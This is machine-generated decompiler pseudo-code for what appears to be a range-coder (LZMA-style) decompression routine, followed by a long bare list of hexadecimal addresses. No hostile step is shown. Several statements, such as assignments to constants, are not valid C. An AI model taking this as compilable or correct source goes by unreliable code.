							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                  0x00000000
                  0x00406398
                  0x00406398
                  0x0040639c
                  0x00406453
                  0x00406456
                  0x00406462
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00406709
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x00000000
                  0x0040672b
                  0x004063a2
                  0x004063a6
                  0x004068e7
                  0x004068e7
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x004063ac
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x00000000
                  0x004068e3
                  0x004063c6
                  0x004063c9
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x004063fa
                  0x004063fa
                  0x004063fa
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
